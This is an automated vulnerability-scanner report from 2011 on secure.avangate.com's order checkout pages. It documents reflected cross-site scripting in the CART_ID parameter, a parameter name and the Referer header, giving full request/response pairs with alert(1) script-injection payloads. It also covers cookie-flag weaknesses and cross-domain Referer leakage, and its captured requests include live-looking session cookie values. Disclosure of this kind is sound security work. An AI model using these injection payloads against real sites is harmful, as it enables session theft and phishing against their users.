secure.avanegate.com, XSS, CWE-79, CAPEC-86, Cross Site Scripting

XSS in secure.avangate.com | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Jan 02 19:17:49 CST 2011.


Contents

Loading

1. Cross-site scripting (reflected)

1.1. https://secure.avangate.com/order/checkout.php [CART_ID parameter]

1.2. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]

1.3. https://secure.avangate.com/order/checkout.php [Referer HTTP header]

2. Cookie without HttpOnly flag set

3. SSL cookie without secure flag set

4. Cookie scoped to parent domain

5. Cross-domain Referer leakage

5.1. https://secure.avangate.com/order/checkout.php

5.2. https://secure.avangate.com/order/legal.php

5.3. https://secure.avangate.com/order/nojs.php

5.4. https://secure.avangate.com/order/privacy.php

5.5. https://secure.avangate.com/order/terms_conditions.php

6. Cross-domain script include

6.1. https://secure.avangate.com/order/checkout.php

6.2. https://secure.avangate.com/order/legal.php

6.3. https://secure.avangate.com/order/nojs.php

6.4. https://secure.avangate.com/order/privacy.php

6.5. https://secure.avangate.com/order/terms_conditions.php

6.6. https://secure.avangate.com/support/

7. Email addresses disclosed



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://secure.avangate.com/order/checkout.php [CART_ID parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8649d"><script>alert(1)</script>a6894fb0eab was submitted in the CART_ID parameter. This input was echoed as 8649d\"><script>alert(1)</script>a6894fb0eab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be738649d"><script>alert(1)</script>a6894fb0eab HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://noteburner.com/order-noteburner.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="/order/nojs.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be738649d\"><script>alert(1)</script>a6894fb0eab" target="_blank">
...[SNIP]...

1.2. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e9f0"><script>alert(1)</script>516e15aff28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e9f0\"><script>alert(1)</script>516e15aff28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5/6e9f0"><script>alert(1)</script>516e15aff28be73 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://noteburner.com/order-noteburner.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:46:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="/order/nojs.php?CART_ID=64575ad4eea753b4b2f5ceb944b5/6e9f0\"><script>alert(1)</script>516e15aff28be73" target="_blank">
...[SNIP]...

1.3. https://secure.avangate.com/order/checkout.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b495"><script>alert(1)</script>f449c907e0e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /order/checkout.php?PRODS=1720528&QTY=1&CART=1 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3b495"><script>alert(1)</script>f449c907e0e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:48:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=8muo5pkos66tr2f1e9k32g3j67ulltcn; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=3b495"><script>alert(1)</script>f449c907e0e">
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /order/checkout.php?PRODS=1720528&QTY=1&CART=1 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://noteburner.com/order-noteburner.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Avangate
Date: Sun, 02 Jan 2011 22:42:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8; expires=Tue, 10-Nov-2020 22:42:55 GMT; path=/; domain=.avangate.com
Location: https://secure.avangate.com/order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be73
Content-Length: 0


3. SSL cookie without secure flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /order/checkout.php?PRODS=1720528&QTY=1&CART=1 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://noteburner.com/order-noteburner.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Avangate
Date: Sun, 02 Jan 2011 22:42:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8; expires=Tue, 10-Nov-2020 22:42:55 GMT; path=/; domain=.avangate.com
Location: https://secure.avangate.com/order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be73
Content-Length: 0


4. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /order/checkout.php?PRODS=1720528&QTY=1&CART=1 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://noteburner.com/order-noteburner.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Avangate
Date: Sun, 02 Jan 2011 22:42:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8; expires=Tue, 10-Nov-2020 22:42:55 GMT; path=/; domain=.avangate.com
Location: https://secure.avangate.com/order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be73
Content-Length: 0


5. Cross-domain Referer leakage  previous  next
There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. https://secure.avangate.com/order/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be73 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://noteburner.com/order-noteburner.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:42:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 83844


<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script type="text/javascript" language="JavaScript">
       if (window != top) {
           top.location.href = location.href;

...[SNIP]...
</title>
   
       
                                                                                                       <link rel="stylesheet" type="text/css" href="https://3619-avangate.voxcdn.com/content/static/css/order/f828415f1f46680d5e5c922acda80c6b/20101223091901.css?20101223091906">

<style type="text/css">
...[SNIP]...
<div class="general_top_nojs_alert"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" alt="" class="sprite sprite-warning-ico-16px" /> For the shopping cart to work properly you'll need to <strong>
...[SNIP]...
<td align="center"><IMG SRC="https://3619-avangate.voxcdn.com/content/images/merchant/3f67fd97162d20e6fe27748b5b372509/swreg-noteburner.gif?20090612132349" border="0"></td>
...[SNIP]...
<td><img src='https://3619-avangate.voxcdn.com/content/images/verifiedbyvisa-t.gif?20070111175046'>&nbsp;<img src='https://3619-avangate.voxcdn.com/content/images/mastercardsecurecode-t.gif?20070111175045'></td>
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank"
href="https://www.scanalert.com/RatingVerify?ref=secure.avangate.com">
<img
width="115" height="32" border="0"
src="//images.scanalert.com/meter/secure.avangate.com/12.gif"
alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime."
oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;">
</a>
...[SNIP]...
<div class="order__payment__methods" id="order__payment__methods">
                                                                                                                       <img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 0;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[0].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[0].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Visa/MasterCard/Eurocard"
                                                                   id="pay_opt_1"
                                                                   class="sprite order__payment__option__button"
                                                               >
<img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 1;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[1].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[1].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="American Express"
                                                                   id="pay_opt_4"
                                                                   class="sprite order__payment__option__button"
                                                               >
<img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 2;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[2].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[2].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Discover/Novus"
                                                                   id="pay_opt_14"
                                                                   class="sprite order__payment__option__button"
                                                               >
<img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 3;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[3].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[3].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Bank/Wire transfer"
                                                                   id="pay_opt_2"
                                                                   class="sprite order__payment__option__button"
                                                               >
<img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 4;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[4].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[4].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Diners Club"
                                                                   id="pay_opt_5"
                                                                   class="sprite order__payment__option__button"
                                                               >
<img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 5;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[5].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[5].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="JCB"
                                                                   id="pay_opt_6"
                                                                   class="sprite order__payment__option__button"
                                                               >
<img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 6;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[6].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[6].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="PayPal"
                                                                   id="pay_opt_8"
                                                                   class="sprite order__payment__option__button"
                                                               >
<img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 7;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[7].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[7].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Fax"
                                                                   id="pay_opt_9"
                                                                   class="sprite order__payment__option__button"
                                                               >
                                                       </div>
...[SNIP]...
<td width="48"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" class="sprite sprite-warning-ico" alt=""></td>
...[SNIP]...
<td width="48"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" class="sprite sprite-warning-ico" alt=""></td>
...[SNIP]...
<div id="order__secure__seal">
                           <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.AVANGATE.COM&lang=en" onClick="window.open(this.href,'verysignwin', 'toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,resizable=no,width=550,height=566');return false;">
           <span id="verisign-logo"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" border="0" class="sprite" /></span>
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/6abf23a6a44f73c8ae38f4e41de26a8e/20101223093110.js?20101223093112"></script>
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/gecadavangate/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

5.2. https://secure.avangate.com/order/legal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/legal.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /order/legal.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be73 HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3701

<div class="order__box" style="">
   <div class="order__box__aux1">
       <div class="order__box__aux2">
           
                           <div class="order__box__title">
                   <div class="order__box__aux1">
                       <div class="orde
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/17aad0bb6ac14f932cc252c720c29135/20100713120959.js?20100825065453"></script>
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/gecadavangate/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

5.3. https://secure.avangate.com/order/nojs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/nojs.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /order/nojs.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be73 HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 15311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</title>
   
       
                                                                           <link rel="stylesheet" type="text/css" href="https://3619-avangate.voxcdn.com/content/static/css/order/b20f2f51715a2528c13e0358fed83ea4/20101223093111.css?20101223093111">

<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
...[SNIP]...
<td class="order__nojs__table__subtitle__wrap"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" class="sprite-ua sprite-ua-firefox order__nojs__table__icon" alt="Firefox" title="Mozilla Firefox" /> <h2 class="order__nojs__table__subtitle">
...[SNIP]...
<td class="order__nojs__table__subtitle__wrap"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" class="sprite-ua sprite-ua-ie order__nojs__table__icon" alt="IE" title="Internet Explorer" /> <h2 class="order__nojs__table__subtitle">
